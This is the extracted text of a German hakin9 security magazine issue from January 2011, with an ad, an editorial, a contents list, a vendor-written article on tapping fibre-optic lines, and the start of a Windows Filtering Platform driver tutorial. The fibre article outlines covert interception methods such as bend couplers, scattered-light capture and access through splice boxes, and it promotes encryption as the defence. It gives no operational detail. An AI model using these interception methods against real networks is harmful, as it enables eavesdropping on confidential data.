Embed Size (px)
DESCRIPTION
hakin9 Januarausgabe
Citation preview
SSL-ZertifikateEinkaufen ist Vertrauenssache -
online und offline!
Ihre Vorteile
90 Tagelängere Laufzeit*
Bis zu
Jederzeit
Unkomplizierte Lieferung
auf Rechnung**
ohne Aufpreis*
Zusätzliche Lizenzen
Persönlicher Supportin deutsch, englisch,spanisch und polnisch
kostenloser
* in den Produktlinien Lite, Silver und Gold
** bei Pay-as-you-Go
Austausch
•DomainValidation(DV)-Zertifikate
•OrganizationValidation(OV)-Zertifikate
•ExtendedValidation(EV)-Zertifikate
•Single-Zertifikate
•Wildcard-Zertifikate
•Multidomain(MDC)-Zertifikate
•UnifiedCommunication/ SubjectAlternativeName(UCC/SAN)-Zertifikate
•ServerGatedCryptographie(SGC)-Zertifikate
Vertrauen Sie auf über
JahreErfahrung
unSERE PRodukTE
4 HAKIN9 5/2009
2011 ist schon da - die erste Januar Ausgabe von hakin9 auch.Das Hauptthema dieser Ausgabe ist „Windows Filtering Platform:
Netzwerkdatenfilterung unter Windows“ - der Artikel von René Espenhahn. Beginnend mit Windows Vista hat Microsoft die Windows Filtering Platform in ihr Betriebssystem integriert. Sie soll die vielen über Jahrzehnte entstandenen Teillösungen zur Filterung der ein- und ausgehenden Netzwerkdaten ersetzen und eine einheitliche Basis zur Filterung bereitstellen. In diesem Artikel werden die Grundlagen der Windows Filtering Platform vorgestellt. Darauf aufbauend wird ein Beispiel aus dem Windows Driver Kit näher erläutert.
Kann ein quelloffenes Pentesting-Tool an seine kommerzielle Pendants he-ranreichen? Welche Informationen eines Zielsystems sind für einen erfolgrei-chen Exploit erforderlich? Welche Vorteile bringt das Metasploit Framework? Darüber erfahren Sie aus dem Artikel von Alexander Winkler „Das Metasploit Framework als Unterstützung bei Penetrationstests“ in der Rubrik Tools.
Lichtgeschwindigkeit ist die höchste Geschwindigkeit, mit der sich Einheiten bewegen können. Auch beim Austausch von Computerdaten setzt man auf optische Übertragungswege, um Höchstgeschwindigkeiten zu erreichen. Mit mehreren Gigabit pro Sekunde werden große Datenmengen in Backbone-Strukturen oder zum Zusammenschluss von Rechenzentren ausgetauscht. Wie Glasfaserleitungen durch Lauschattacken bedroht werden, warum das so ist und welche Schutzmaßnahmen IT-Verantwortliche ergreifen sollten, erläu-tert uns Leonhard Zilz in dem Artikel „Angriffe in Lichtgeschwindigkeit - Gefahr durch Lauschattacken auf Glasfaserleitungen“ in der Rubrik Angriff.
Besonders empfehlenswert ist das Interview mit Thomas Hackner, dem Geschäftsführer von HACKNER Security Intelligence. Diesmal unterhalten wir uns über Industrie- und Wirtschaftsspionage, IT-Penetration Tests, Social Engineering Audits und das Projekt SecurityPitfalls.org.
Ich hoffe, dass wir mit dieser Ausgabe Ihren Herausforderungen gewachsen sind.
Wenn Sie Ideen, Bemerkungen oder Tipps für Hakin9 haben, neh-men Sie sich kurz Zeit und beantworten die 11 Fragen, die unter: http://hakin9.org/de/leserumfrage zu finden sind. Ihre Meinung ist uns wichtig. Damit helfen Sie uns das hakin9 IT Security Magazin noch besser zu gestalten und weiterzuentwickeln.
Viel Spaß bei der Lektüre!Ilona Przybysławska
LIEBE HAKIN9 LESER,
4
INHALTSVERZEICHNIS
PRAXIS20 Schwachstellen bei der Ressourcenopti-mierung im virtuellen RaumSteve HampickeDie Virtualisierung von physischen Systemen gewinnt mehr und mehr an Bedeutung. Mittlerweile ein alter Hase unter den Virtualisierungsarten ist die Servervir-tualisierung. Sie hat sich bereits in Unternehmen und Behörden etabliert und verdrängt erfolgreich die „alte“ physische Serverstruktur. Unternehmen und Behörden versprechen sich durch den Einsatz der Virtualisie-rung Kosteneinsparungen durch eine Reduzierung der Server-Hardware, Senkung der Energie und Minimie-rung des benötigten Platzes im Rechenzentrum. Doch die Virtualisierung von Servern bringt durch die neuen Techniken auch zusätzliches Gefahrenpotential gegen-über physischen Servern mit sich.
TOOLS32 Das Metasploit Framework als Unterstüt-zung bei PenetrationstestsAlexander WinklerGenaue und stets aktuelle Informationen zu besitzen ist heutzutage sehr viel wert, alles andere gleicht einem Blindflug im Düsenjet. Dies stimmt jedenfalls auch in Verbindung mit Penetrationstest. Ein Test kann immer nur das widerspiegeln was überhaupt erst entdeckt wur-de. Das Metasploit Framework eignet sich in besonderer Weise als unterstützendes Mittel beim Pentesting.
ANGRIFF06 Angriffe in Lichtgeschwindigkeit Gefahr durch Lauschattacken auf GlasfaserleitungenLeonhard ZilzLichtgeschwindigkeit ist die höchste Geschwindigkeit, mit der sich Einheiten bewegen können. Auch beim Austausch von Computerdaten setzt man auf optische Übertragungswege, um Höchstgeschwindigkeiten zu erreichen. Mit mehreren Gigabit pro Sekunde werden große Datenmengen in Backbone-Strukturen oder zum Zusammenschluss von Rechenzentren ausgetauscht. Je mehr Daten in solchen Glasfasernetzen übertragen werden, umso brisanter werden auch Abhörattacken.
SICHERHEITSANWEN-DUNGEN10 Windows Filtering Platform: Netzwerkda-tenfilterung unter WindowsRené EspenhahnBeginnend mit Windows Vista hat Microsoft die Windows Filtering Platform in ihr Betriebssystem integriert. Sie soll die vielen über Jahrzehnte entstandenen Teillösungen zur Filterung der ein- und ausgehenden Netzwerkdaten erset-zen und eine einheitliche Basis zur Filterung bereitstellen. In diesem Artikel werden die Grundlagen der Windows Fil-tering Platform vorgestellt. Darauf aufbauend wird ein Bei-spiel aus dem Windows Driver Kit näher erläutert.
1/2011
4 6/2010
herausgegeben vom Verlag:Software Press Sp. z o. o. SK
Geschäftsführer: Paweł Marciniak
Managing Director: Ewa Łozowicka [email protected]
Chefredakteurin: Ilona Przybysł[email protected]
Redaktion/Betatester: Leonhard Zilz, Steve Hampicke, René Espenhahn, Alexan-der Winkler, Christian Stockhorst, Thomas Hackner, Christian Heutger, Björn Schulz, Michael Schratt, Ilias Aidonis
Produktion: Andrzej KucaDTP: Przemysław Banasiewicz
Umschlagsentwurf: Przemysław BanasiewiczWerbung: [email protected]
Anschrift: Software Press Sp. z o.o. SKul. Bokserska 1, 02-682 Warszawa, PolandTel. +48 22 427 36 56, Fax +48 22 244 24 59www.hakin9.org/de
Die Redaktion bemüht sich, dafür Sorge zu tragen, dass die in der Zeitschrift sowie auf den begleitenden Datenträgern erhaltenen Informationen und Anwendungen zutreffend und funktionsfähig sind, übernimmt jedoch keinerlei Gewähr für derer Geeignetheit für bestimmte Verwendungszwecke. Alle Mar-kenzeichen, Logos und Handelsmarken, die sich in der Zeitschrift befinden, sind regist-rierte oder nicht-registrierte Markenzeichen der jeweiligen Eigenümer und dienen nur als inhaltliche Ergänzungen.
Anmerkung!Die in der Zeitschrift demonstrierten Techniken sind AUSSCHLIEßLICH in eigenen Rechner-netzen zu testen! Die Redaktion übernimmt keine Haftung für eventuelle Schäden oder Konsequenzen, die aus der unangemessenen Anwendung der beschriebenen Techniken entstehen. Die Anwendung der dargestellten Techniken kann auch zum Datenverlust führen!hakin9 erscheint in folgenden Sprachversionen und Ländern: deutsche Version (Deutschland, Schweiz, Österreich, Luxemburg), französische Version (Frankreich, Kanada, Belgien, Marok-ko), spanische Version (Spanien, Portugal), polnische Version (Polen), englische Version (Kanada, USA)
hakin9.org/de 5
29 Die rasche Auslieferung statischer Inhalte mittels Secure CDN - Weil auch bei der Sicher-heit die Geschwindigkeit zähltChristian HeutgerBei der Übertragung von Inhalten ist auf Websites und in Online-Shops die Geschwindigkeit einer der wesent-lichsten Erfolgsfaktoren: Denn Kundenbindung sowie ein gutes Listing in Suchmaschinen sind im Internet eben auch von der Höhe der Geschwindigkeit abhän-gig, mit der Inhalte – ganz gleich ob Texte, Bilder, Flash-Content, Scripts oder Videos – geladen werden. Indem sie dafür sorgt, dass Besucher Freude an einer „schnel-len“ Website haben und sie dadurch öfter besuchen so-wie länger auf ihr verweilen, übt die Lade-Geschwindig-keit einen wesentlichen Einfluss auf die Qualität eines Websitebesuchs und damit auf den Umsatz aus.
5
36 Ncrack – Netzwerkauthentifizierungen knackenChristian StockhorstDieser Artikel beschreibt wie mit dem Tool Ncrack ver-schiedene Dienste im Netzwerk bzw. die Computer und andere Geräte im Netzwerk auf denen diese Dienste laufen auf schwache Passwörter überprüft werden kön-nen. Ncrack bedient sich dabei einem modularem An-satz, für verschiedene Services.
INTERVIEW 44 Interview mit Thomas Hackner„Zu aller erst sollte man sich seiner Situation, seiner schutzwürdigen Interessen und seiner Risiken bewusst sein.“ Mehr erfahren Sie aus dem Interview mit Thomas Hackner, dem Geschäftsführer von HACKNER Security Intelligence.
EXPERTENBEREICH PSW GROUP26 Malware-Scan mittels Comodo HackerProof oder VeriSign Trust SealChristian HeutgerBedingt durch die Befürchtung vieler Verbraucher, beim Einkauf im Internet Opfer von Identitäts- beziehungswei-se Datendiebstahl zu werden, entgingen Online-Händ-lern allein im Jahr 2008 Umsätze in Höhe von 21 Mil-liarden US-Dollar. Das ergaben Studien von VeriSign, einem Spezialisten für Zertifikatslösungen im Internet. Für Online-Shop- und Website-Betreiber gilt es daher Lösungen zu finden, mit deren Hilfe sie Besuchern ihrer Website, also potenziellen Kunden, aufzeigen können, dass sie sich auf einer vertrauenswürdigen, sicheren Website befinden, die täglich auf Schadcode, Malware und sonstige Schwachstellen hin gescannt wird.
InhaltsverzeIchnIs
Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem deutschen Recht stattgefunden haben und die IT-Sicherheit be-treffen, möchten wir ankündigen, dass hakin9-Abwehrmethoden Magazin seinem Profil treu bleibt.
Unser Magazin dient ausschließlich den Erkenntniszwecken. Alle im Magazin präsentierten Methoden sollen für eine sichere IT fungieren. Wir legen einen großen Wert auf die Entwicklung von einem sicheren elektronischen Umsatz im Internet und der Be-kämpfung von IT Kriminalität.
1/20116
ANGRIFF
Je mehr Daten in solchen Glasfasernetzen übertra-gen werden, umso brisanter werden auch Abhör-attacken.
Geheime Informationen in fremden Händen – die Auswir-kungen kennt man von WikiLeaks. Von Filmmaterial über US-Militäroperationen bis zu diplomatischen Geheimpa-pieren reichen die veröffentlichten Dokumente bisher. Als
nächste Enthüllung kündigt das Internet-Projekt an, das In-nenleben einer großen US-Bank ausstellen zu wollen. Die Enthüllungsplattform, aber auch klassische Medien, greifen zur Erfüllung ihrer journalistischen Aufgabe auf Material zu-rück, das an sie weitergeleitet wurde. So brisant die ver-öffentlichten Informationen auch sein mögen - auf einem anderen Feld sind Finanzinstitute sowie viele andere Unter-
Angriffe in LichtgeschwindigkeitGefahr durch Lauschattacken auf Glasfaserleitungen
Lichtgeschwindigkeit ist die höchste Geschwindigkeit, mit der sich Einheiten bewegen können. Auch beim Austausch von Computerdaten setzt man auf optische Übertragungswege, um Höchstgeschwindigkeiten zu erreichen. Mit mehreren Gigabit pro Sekunde werden große Datenmengen in Backbone-Strukturen oder zum Zusammenschluss von Rechenzentren ausgetauscht.
IN DIESEM ARTIKEL ERFAHREN SIE…• wie Glasfaserleitungen durch Lauschattacken bedroht wer-
den, warum das so ist und welche Schutzmaßnahmen IT-Ver- antwortliche ergreifen sollten.
WAS SIE VORHER WISSEN SOLLTEN…• keinspeziellesVorwissen
Leonhard Zilz
Abbildung 1. Lauschangriff auf Glasfaserkabel mit der Splitter-Coupler-Methode.
Abbildung 2. Angreifer biegen die Glasfaser, um mittels Biegekoppler auf den Informationsfluss zuzugreifen.
Angriffe in Lichtgeschwindigkeit
hakin9.org/de 7
gnals ist im Angriffsverlauf technisch nachweisbar. Dafür wird nicht einmal Spezialtechnik benötigt, denn solche Geräte sind frei erhältlich und gehören zur Standardaus-rüstung der Wartungstechniker, die den Zustand und die Funktion von Lichtwellenleitern regelmäßig überprüfen.
Neugierige Mitlauscher können aber auch den direk-ten Kontakt mit der Datenleitung komplett vermeiden („Non-touching Methods“). Sie machen sich dabei zu-nutze, dass jedes Glasfaserkabel eine minimale Licht-menge während des Weitertransports verliert. Empfind-liche Fotodetektoren können diese Rayleigh-Streuung auffangen, die seitlich aus dem Kabel austritt. Aus dem technischen Betrieb kennen die Carrier diesen Streuef-fekt und gleichen den Verlust auf langen Übertragungs-strecken aus, indem sie die Signale verstärken. In gleicher Weise erhalten unbefugte Angreifer nunmehr lesbare Daten und können sie über Snifferprogramme auswerten. Auch große Echtzeit-Datenmengen lassen sich so auf Interna, Passwörter, Projekt-, Kunden- oder Personendaten durchsuchen.
Wie verschaffen sich Angreifer physischen Zugriff?Die fest eingebauten Zugangspunkte eines Glasfasernet-zes eignen sich als unauffälliger Angriffspunkt für Daten-
nehmen viel direkter betroffen. Bekannte Schwachstellen optischer Glasfaserleitungen lassen sich ausnutzen, um an wertvolle Informationen zu kommen.
Denn Glasfaserstrecken sind vor allem bei Hochlei-stungsrechenzentren mit besonders hohen Anforde-rungen an Rechenleistung und Bandbreite im Einsatz, wie sie in Banken, Versicherungen, Unternehmen und öffentlichen Verwaltungen typisch sind. Hier laufen in Hochgeschwindigkeit übertragene Echtzeitdaten und bandbreitenintensive Dienste über optische Übertra-gungssysteme. Der Datenhunger moderner Netzwerke wächst und so müssen die Verbindungswege neben ei-ner hohen Übertragungsgeschwindigkeit auch bei Ska-lierbarkeit, Kapazität, Kompatibilität und Wirtschaftlich-keit überzeugen.
Optische Glasfaserleitungen mit Gigabit-Übertra-gungsgeschwindigkeiten decken diese Bedürfnisse ab und verschicken Echtzeitinformationen von Standort zu Standort. Sie verfügen über die notwendigen Eigen-schaften, um der im täglichen Geschäftsbetrieb anfal-lenden Datenflut aus E-Mails, hochauflösenden Bildern oder E-Business-Systeminformationen Herr zu werden. In gleicher Weise punktet die Kommunikationstechno-logie in Lichtgeschwindigkeit bei Einsatzszenarien mit noch schärferen technischen Vorgaben – wie zum Bei-spiel bei Backup- und Disaster-Recovery-Daten. Unter Einhaltung von Compliance- und Best-Practice-Vorga-ben lassen sich alle relevanten Daten auf separate Spei-chermedien übertragen. Glasfasernetze sorgen auch für den reibungslosen Betrieb gemeinschaftlich genutzter ERP-Systeme und E-Business-Applikationen.
Wenn Glasfasern gebogen werden…Neben den vielen Vorteilen dürfen auch die sicherheits-technischen Nachteile nicht verschwiegen werden. Im öffentlichen Bewusstsein nicht verankert ist zum Bei-spiel, dass der blitzschnelle Austausch vertraulicher In-formationen über optische Netzwerke nicht ohne Risi-ko ist. Lange hielt sich das Gerücht, Glasfaserleitungen seien im Gegensatz zu Kupferleitungen abhörsicher. Dabei sind für erfolgreiche Attacken auf optische Daten lediglich andere Angriffsmethoden nötig, um in Glasfa-sernetzen fündig zu werden.
Über solche „Optical Tapping Methods“ lassen sich im allein deutschlandweit 340.000 Kilometer großen Glas-fasernetz jederzeit und von überall vermeintlich siche-re Informationen abfangen. Durch Biegen der Glasfaser („Splitter-Coupler-Methode“) mittels Biegekoppler lässt sich ein kleiner Prozentsatz des Lichts umleiten, ohne die Glasfaser zu verletzen. Wirtschaftsspione können dann auf den Informationsfluss heimlich zugreifen, das Signal über moderne Empfänger verstärken und die Daten in digital umgewandelter Form auslesen. Während des ge-samten Lauschangriffes bleibt der Netzwerkbetrieb stö-rungsfrei und nur eine minimale Veränderung des Nutzsi-
Abbildung 3. Rund um die Erde liegen über 300 Millionen Kilometer gezogene Glasfaserkabel.
1/20118
ANGRIFF
diebe. In den Verteilerkästen sind die einzelnen Fasern der Kabel miteinander verbunden und einige Leitungen eines Kabelbündels häufig auch markiert. Eigentlich nutzen Pro-vider die Verteilerkästen, die über das ganze Streckennetz an verschiedenen Orten verteilt sind, nur zur Erkennung und Beseitigung von Störungen. Nach einem erfolgrei-chen Zugriff auf die Wartungskästen haben die Angreifer leichtes Spiel und können Lauschangriffe beginnen.
Und das ist leichter als gedacht, denn die Spleisstel-len sind in der Regel nur ungenügend vor unbefugtem Zugriff geschützt und damit eine echte Schwachstelle des Streckennetzes. Kein Wunder also, dass mittler-weile mehrere Fälle dokumentiert wurden, bei denen Glasfaserverbindungen abgehört wurden. In der Nähe der Finanzmetropole Frankfurt am Main beispielsweise starteten unbekannte Eindringlinge einen Abhörversuch auf drei Hauptverbindungen und wollten den über Glas-faserleitungen laufenden Datenverkehr mitschneiden. Ein vergleichbarer Lauschangriff auf die US-amerikani-sche Supermarktkette Hannaford hatte den Diebstahl von circa 4,2 Millionen Kreditkartendaten zur Folge. Der größte Industrieverband Nordamerikas, die National Association of Manufacturers (NAM), geht deshalb von einer ernstzunehmenden Gefährdung durch den Raub optisch übertragener Daten aus. Ihre Fachleute war-nen, dass das Anzapfen von Glasfaserleitungen eine weit verbreitete Methode zur Wirtschaftsspionage ist.
In einer aktuellen IDC-Studie fragt der Analyst Romain Fouchereau provokativ, ob die vermeintliche Sicherheit in optischen Glasfasernetzen nicht nur eine optische Täu-schung sei. Schließlich gehe Glasfasernetzen in der öf-fentlichen Wahrnehmung fälschlicherweise immer noch der Ruf voraus, die schnellste, zuverlässigste und sicher-ste Technologie zu sein, um Daten zwischen verschie-denen Netzwerken auszutauschen. Fouchereaus Fazit: „Dieser Ruf hat sich als falsch erwiesen, denn neue und kostengünstige Technologien haben es Hackern ermög-licht, auf einfache Art und Weise Daten zu stehlen.“
Kryptographie verdunkelt geheime InformationenBest-Practice-Vorgaben für das Banken- und Versiche-rungsumfeld sowie andere Branchen empfehlen daher, den Transport sensibler Informationen grundsätzlich durch starke Verschlüsselung zu schützen. Das schreiben Regel-werke wie SOX, PCI-DSS, Basel II oder Datenschutzrichtli- nien vor. Auch das deutsche Bundesamt für Sicherheit in der Informationstechnik (BSI) sieht Handlungsbedarf und empfiehlt den Einsatz von Kryptographie. Im Rahmen ei-ner Information-Risk-Management-Strategie sind dabei Verschlüsselungstechnologien wie AES (Advanced En-cryption Standard) mit Schlüssellängen bis zu 256 Bit die gängige Methode, sensible Daten zu schützen.
Ein Spezialanbieter für die Entwicklung und Implemen-tierung von Verschlüsselungslösungen in optischen Glas-fasernetzen ist die Schweizer InfoGuard AG. Mit einem Produktportfolio verschiedener Hardware-Appliances konzentriert sie sich auf die kryptographische Absiche-rung hochsensibler Umgebungen im Banken-, Industrie- und Dienstleistungsumfeld. InfoGuard bietet Verschlüsse-lungsplattformen mit Übertragungsraten von bis zu zehn Gigabit pro Sekunde für stark ausgelastete Links und zeit-tark ausgelastete Links und zeit-kritische Anwendungen. Die Chiffriergeräte zum Schutz von Gigabit-Ethernet-, SONET-, SDH-, Fibre-Channel-, FICON-, Fast-Ethernet- und E1-Verbindungen kommen unabhängig von der eingesetzten Netzwerk-Topologie oh-ne Overhead aus und lassen sich flexibel in die bestehen-den Netzwerkinfrastruktur e integrieren.
Abbildung 4. Hardware-Verschlüsselungslösungen von InfoGuard bringen „Dunkel ins Licht“.
LEONHARD ZILZDer Autor ist Sales Director Europe Central & East bei der Info-Guard AG. Seit drei Jahrzehnten ist er in der IT Branche in ver-schiedenen verantwortlichen Positionen tätig und hat in den vergangenen Jahren seinen beruflichen Schwerpunkt auf die Themen Sicherheit und Verschlüsselung von Daten gelegt.Kontakt mit dem Autor: [email protected]
1/201110
SICHERHEITSANWENDUNGEN
EinführungMit der Veröffentlichung von Windows Vista im Jahr 2007 hatte Microsoft unter dem Namen Next generation network driver stack den Netzwerkstack des Betriebssystems na-hezu komplett erneuert. Zu den Neuerungen gehörte unter anderem die Windows Filtering Platform[1] (WFP). Sie soll-te spätestens ab Windows 7 die verwendeten Filter-Treiber des Transport Driver Interface (TDI), die TCP/IP-Filter- und Firewall-Hook-Treiber, die Winsock Layered Service Provi-der (LSP) und teilweise die Intermediate-Treiber der Net-work Driver Interface Specification (NDIS) durch eine ein-heitliche Plattform zum Filtern der ein- und ausgehenden Netzwerkdaten vollständig ablösen. Unter Windows Vista hatte die WFP allerdings noch einige Kinderkrankheiten, die dazu führten, dass viele Sicherheitsfirmen sie in ihren Produkten bis Windows 7 nicht produktiv einsetzten. Ein-hergehend mit Windows 7 hat Microsoft die WFP verbes-sert und die Kinderkrankheiten weitestgehend beseitigt. Weiterhin haben sie den alten Technologien noch einen letzten zeitlichen Aufschub gegeben und nicht, wie in den Fußnoten[2] im MSDN vermerkt, deren Unterstützung mit der Veröffentlichung von Windows 7 eingestellt. Nichts des-to trotz kann Microsoft TDI & Co. nun jederzeit aus ihrem Betriebssystem entfernen. Es ist somit spätestens an der Zeit auf die Windows Filtering Platform umzusteigen.
Architektur der WFPDie WFP besteht aus vier Teilen, die in Abbildung 1 farblich hervor gehoben sind. Von den vier Teilen be-
findet sich einer im User-Mode und drei im Kernel-Mo-de des Betriebssystems. User-Mode und Kernel-Mode sind dabei Ausführungsebenen des Betriebssystems. Im User-Mode werden alle normalen Programme wie beispielsweise Office ausgeführt, während im Kernel-Mode die Treiber sowie Betriebssystem-interne Funkti-onen ausgeführt werden.
Seitens der WFP ist die Base Filter Engine (BFE) im User-Mode angesiedelt. Sie bietet verwaltende Schnitt-stellen zur Installation, Konfiguration und Deinstallation von WFP-Komponenten sowie Schnittstellen zur Sta-tusabfrage der installierten Komponenten. Zu den Kom-ponenten der WFP zählen hauptsächlich Filter. Damit ein Filter Netzwerkdaten filtern
kann, muss er um weitere Komponenten, die in Abbil-dung 2 um den Filter dargestellt sind, ergänzt werden. Hierbei sind vor allem die pink dargestellten Kompo-nenten wichtig, denn sie sind zwingend für den Betrieb eines Filters notwendig. Sie werden im späteren Verlauf detaillierter erklärt. Dadurch, dass die BFE im User-Mo-de angesiedelt ist, lassen sich Filter innerhalb norma-ler Programme erstellen und konfigurieren ohne, dass zwingend ein Kernel-Mode-Treiber entwickelt werden muss. Wird ein Filter mittels der Schnittstelle der BFE installiert, landet dieser, falls er nicht auf dem Internet Key Exchange (IKE)-, IPsec- oder User-Mode Remo-te Procedure Call (RPC) Layer operiert, in der Kernel-Mode Filter Engine (KMFE) und somit im Kernel des Betriebssystems.
Windows Filtering Platform Netzwerkdatenfilterung unter Windows
Beginnend mit Windows Vista hat Microsoft die Windows Filtering Platform in ihr Betriebssystem integriert. Sie soll die vielen über Jahrzehnte entstandenen Teillösungen zur Filterung der ein- und ausgehenden Netzwerkdaten ersetzen und eine einheitliche Basis zur Filterung bereitstellen. In diesem Artikel werden die Grundlagen der Windows Filtering Platform vorgestellt. Darauf aufbauend wird ein Beispiel aus dem Windows Driver Kit näher erläutert.
IN DIESEM ARTIKEL ERFAHREN SIE…• GrundlagenderWindowsFilteringPlatform.• EntwicklungeinesNetzwerkfiltersmittelsderWindowsFilte-
ring Platform
WAS SIE VORHER WISSEN SOLLTEN…• AufbaudesTCP/IP-Stack.• GrundlagenzurKerneltreiberentwicklung.
René Espenhahn
Windows Filtering Platform Netzwerkdatenfilterung unter Windows
hakin9.org/de 11
WFP-Layern installiert sind und diese können die Netz-werkdaten nach ihren Kriterien filtern. Die KMFE sam-melt alle Entscheidungen der Filter (Block oder Permit) und sendet das Endergebnis zurück zur ursprünglichen Shim-Komponente. Wird der Shim-Komponente von der KMFE ein Block übermittelt, blockiert und verwirft sie die Netzwerkdaten. Bei einem Permit können die Daten ihren Weg zum nächsten TCP/IP-Layer und so-mit zur nächsten Shim-Komponente bzw. zum Ziel fort-setzen. Abbildung 3 veranschaulicht dies.
Filter können, wie in Abbildung 2 dargestellt, optio-nal Bedingungen enthalten. Eine Bedingung kann bei-spielsweise sein, dass ein Filter nur Netzwerkdaten von einem speziellen Quellport filtern soll. Obwohl mit Win-dows 7 die Anzahl der unterschiedlichen Bedingungen gestiegen ist, beschränken sie sich weiterhin auf die Metadaten des Payload der Netzwerkdaten. Soll hinge-gen untersucht werden, ob das Wort rainy im Payload der Netzwerkdaten enthalten ist, so ist dieses mit ei-ner Bedingung nicht realisierbar. Es muss ein Callout verwendet werden. Callouts sind benutzerdefinierte Routinen im Kernel-Mode. Besitzt ein Filter eine Call-out-Referenz, so leitet der Filter alle Netzwerkdaten zur Entscheidungsfindung an den Callout weiter. Inner-halb des Callout kann ein Entwickler die Netzwerkdaten
Die KMFE ist das Herzstück der WFP. Sie steuert die Anwendung sämtlicher installierter Filter. Wie in Abbil-dung 2 ersichtlich muss jeder Filter zwingend eine Lay-er-Komponente besitzen. Die Layer-Komponente defi-niert, auf welchem WFP-Layer der Filter arbeitet und somit, welche Daten der Filter von der KMFE zur Filte-rung übermittelt bekommt. In Abbildung 1 werden inner-halb der orange hervorgehobenen KMFE lediglich die zum TCP/IP-
Stack passenden Filter-Layer dargestellt. Insgesamt besitzt die KMFE über 70 verschiedene Layer[4], an de-nen Filter hinzugefügt werden können, um die dort ein-treffenden Netzwerkdaten zu filtern. Die hohe Zahl an Filter-Layer ergibt sich größten Teils daraus, dass viele Filter-Layer bis zu viermal vorhanden sind. Viermal des-wegen, da die WFP oft zwischen IPv4 und IPv6 sowie ein- und ausgehender Richtung der Netzwerkdaten un-terscheidet.
Die Netzwerkdaten bezieht die KMFE mittels der in Abbildung 1 grün dargestellten Shim-Komponenten aus dem TCP/IP-Stack. Die Shim-Komponenten sind hier-bei auf den verschiedenen Layern des TCP/IP-Stack installiert und leiten die bei ihnen ankommenden Netz-werkdaten zur KMFE um. Die KMFE reicht die Daten ihrerseits weiter zu den Filtern, die auf den betreffenden
Abbildung 1. Architektur der Windows Filtering Platform. Quelle: [3]
1/201112
SICHERHEITSANWENDUNGEN
ganz nach seinen Wünschen untersuchen und daraus die Entscheidung Block zum Blockieren oder Permit zum Passieren treffen.
In Abbildung 3 werden zwei konkrete Abläufe einer Filterung mittels der WFP schematisch dargestellt. Im oberen Fall trifft eine Anfrage (A.) mit Zielport (ZP) 80 im TCP/IP-Stack ein. Der Stream Layer Shim der WFP leitet die Anfrage aus dem TCP/IP-Stack um zur KM-FE. Die KMFE überprüft nun, welche Filter die Anfrage zur Filterung übergeben bekommen müssen und sor-tiert diese absteigend nach ihrer Gewichtung, auf die im späteren Verlauf noch eingegangen wird. Parallel da-zu prüft sie die Bedingungen der Filter und sieht, dass der Filter mit der hohen Gewichtung (HG, zweiter von rechts) die Bedingung hat, nur Daten mit Zielport 8080 zu filtern. Da die Bedingung zur Anfrage nicht passt, wird dieser Filter übersprungen und dem niedriger ge-wichteten (NG) Filter die Anfrage übergeben. Dieser verfügt über einen Callout und sendet seinerseits die Anfrage zur Entscheidungsfindung weiter an den Call-out. Der Callout entscheidet, dass die Anfrage blockiert werden soll und gibt diese Entscheidung zurück, wel-che nun, da kein weiterer Filter vorhanden ist, bis zum ursprünglichen Shim durchgereicht wird. Dieser verwirft die Anfrage aufgrund des Blocks.
Der zweite Fall betrifft eine Anfrage mit dem Zielport 8080, sodass beide Filter aktiv werden. Hier kommt die Gewichtung zum Tragen und der HG-Filter bekommt die Anfrage zuerst von der KMFE. Nachdem er seine Entscheidung getroffen hat, bekommt der niedriger ge-wichtete Filter die Daten und gibt sie wieder seinem Callout, der in diesem Fall, genauso wie der HG-Filter, ein Permit zurückgibt. Die Permit-Entscheidung wird er-neut, da kein weiterer Filter vorhanden ist, bis zum ur-sprünglichen Shim durchgereicht. Dieser gibt die Da-
ten, aufgrund des Permits, zurück in den TCP/IP-Stack, sodass sie ihren Weg fortsetzen können.
Vorbereitung zur FilterentwicklungIm weiteren Verlauf wird nun ein von Microsoft zur Ver-fügung gestellter Filter untersucht, der mittels Callout eine Filterung des Payload vollzieht. Der Filter ersetzt dabei in den Netzwerkdaten mit Zielport 5001 das Wort rainy gegen das Wort sunny. Da für den Callout ein Ker-nel-Mode Treiber notwendig ist, wird das Windows Dri-ver Kit (WDK) benötigt[5].
Das WDK beinhaltet die Build-Umgebungen für die verschiedenen Windows-Versionen zum Kompilieren von Treibern, alle notwendigen Header-Dateien sowie Tools zur Treiberanalyse. Zum Entwickeln des Treibers wird Visual Studio 2010 verwendet, allerdings nur des-sen Editor. Kompiliert wird der Treiber nicht mittels Visu-al Studio, sondern mit der jeweiligen Build-Umgebung des WDK.
Sobald das WDK installiert ist, befindet sich das hier untersuchte WFP-Beispiel[6] im Unterordner src\net-work\trans\stmedit. Innerhalb von Visual Studio wird nun ein neues, leeres Visual C++-Projekt erstellt. Im Anschluss daran sollten alle Dateien aus dem WFP-Beispiel-Verzeichnis in das Projektverzeichnis kopiert werden, damit der ursprüngliche Beispielcode unverän-dert bleibt. Nach dem Kopieren müssen die einzelnen Quelltext- (*.c) und Headerdateien (*.h) dem Visual Stu-dio-Projekt hinzugefügt werden. Alle anderen Dateien sind vorerst nicht relevant und können ignoriert werden.
Visual Studio zeigt nun an, dass einige #include un-bekannt sind. Das liegt daran, dass Visual Studio das WDK nicht kennt. Dieses lässt sich lösen, indem das WDK in den Projektoptionen unter dem Punkt VC++-Verzeichnisse hinzugefügt wird. Dazu muss bei Inclu-
Abbildung 2. Komponenten der Windows Filtering Platform.
Windows Filtering Platform Netzwerkdatenfilterung unter Windows
hakin9.org/de 13
deverzeichnisse das WDK-Unterverzeichnis inc\ddk und bei Bibliotheksverzeichnisse das WDK-Unterver-zeichnis lib\win7\i386 hinzugefügt werden. Letzteres ist abhängig von der verwendeten Windowsversion. Hier wird Windows 7 x86 verwendet. Nach den Ergänzun-gen sollte Visual Studio alle Quellen kennen. Sollten
unter Windows 7 weiterhin Fehler angezeigt werden, so liegt das an Leerzeilen im Windows 7 SDK, die entfernt werden müssen[7].
Das Streamedit-BeispielDas Microsoft Streamedit-Beispiel ist ein reiner Kernel-Mode Treiber. Die Filter können deswegen nicht mittels der Schnittstellen der BFE, sondern müssen direkt an der KMFE installiert werden. Der Beispiel-Treiber glie-dert sich in drei Teile. Die stream_callout.c ist für das Laden, Initialisieren und Entladen des Treibers verant-wortlich. Die beiden Teile inline_edit.c und oob_edit.c sind die verschiedenen Implementierungen zum Durch-suchen und Ersetzen der Netzwerkdaten, wovon hier lediglich die Inline-Variante betrachtet wird.
